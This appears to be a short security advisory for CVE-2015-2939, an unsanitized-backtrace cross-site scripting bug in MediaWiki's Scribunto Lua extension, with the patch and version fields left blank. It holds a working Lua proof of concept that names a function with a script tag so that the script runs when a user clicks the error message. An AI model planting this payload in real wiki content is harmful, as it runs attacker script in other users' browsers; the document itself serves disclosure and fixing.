Function names in Scribunto's Lua error backtraces are displayed to the user without being sanitized, allowing XSS attacks. Proof-of-concept:
local p = {}
p['<script>alert("XSS")</script>'] = function()
error('CLICK ME')
end
function p.main(frame)
p['<script>alert("XSS")</script>']()
end
return pIf a user, in order to view the backtrace, clicks on the error message generated by invoking p.main(), the script will run.
Patch:
- 1.24:
- 1.23:
Affected Versions: (needed)
Type: xss
CVE: CVE-2015-2939